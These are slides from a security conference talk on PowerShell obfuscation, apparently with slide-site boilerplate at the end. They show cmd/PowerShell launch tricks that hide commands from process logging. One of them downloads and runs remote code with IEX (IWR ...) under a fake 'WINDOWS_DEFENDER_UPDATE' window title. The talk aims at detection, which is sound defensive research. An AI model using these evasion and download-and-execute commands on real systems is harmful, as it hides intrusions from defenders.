SUPPLEMENTAL

Launch Techniques
So can we assume that PowerShell commands will be
found in either powershell.exe or the parent process?

Launch Techniques

Launch Techniques
• cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green&& cmd /c echo %cmd%
| powershell -"
PowerShell command is still visible in parent: cmd.exe

Launch Techniques
^| powershell -"
Escape | with ^ for
cmd.exe
Does this work???

Launch Techniques
^| powershell -"
Does this work???
YES!
PowerShell command has been
abstracted from both powershell.exe
and parent process cmd.exe

Launch Techniques
^| powershell -"
• cmd /c echo %cmd% | powershell -
• powershell -
• Detect by recursively checking parent process command
arguments? Not 100% of the time.

Launch Techniques
• Set content in one process and then query it out and execute it from another
completely separate process. NO SHARED PARENT PROCESS!
• cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR
https://bit.ly/L3g1t)&& FOR /L %i IN (1,1,1000) DO echo"
• cmd /c "powershell IEX (Get-WmiObject Win32_Process -Filter ^"Name =
'cmd.exe' AND CommandLine like
'%WINDOWS_DEFENDER_UPDATE%'^").CommandLine.Split([char]38)[2].SubStr
ing(5)"

Invoke-Obfuscation Demo
• Overview and demo of brand new tool: Invoke-Obfuscation
• DISCLAIMER: Please do not use this tool for evil.

Closing Comments
• Obfuscation is already being used by attackers
• A purely Command Argument defensive approach is difficult (but possible)
• But what if this were being performed in Python? Or VBA?
• How robust is their logging?
• PowerShell Scriptblock logging simplifies all but the last layer of obfuscation
• Break all assumptions, know your options, and hunt for Indicators of
Obfuscation

Thank You
• Nick Carr, Matt Dunwoody, Devon Kerr & Willi Ballenthin
• Evan Pena, Chris Truncer, James Hovious & Robert Davis
• My wife, Paige
• 100’s of hours of research
• 300+ hours of tool development
• Listening to me talk about PowerShell

Questions?
• Daniel Bohannon
• @danielhbohannon
• http://danielbohannon.com
• https://github.com/danielbohannon/Invoke-Obfuscation

[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To) D""e`Tec`T 'Th'+'em' by Daniel Bohannon

More Related Content

What's hot (20)

Viewers also liked (20)

Similar to [CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To) D""e`Tec`T 'Th'+'em' by Daniel Bohannon (20)

More from CODE BLUE (20)

Recently uploaded (20)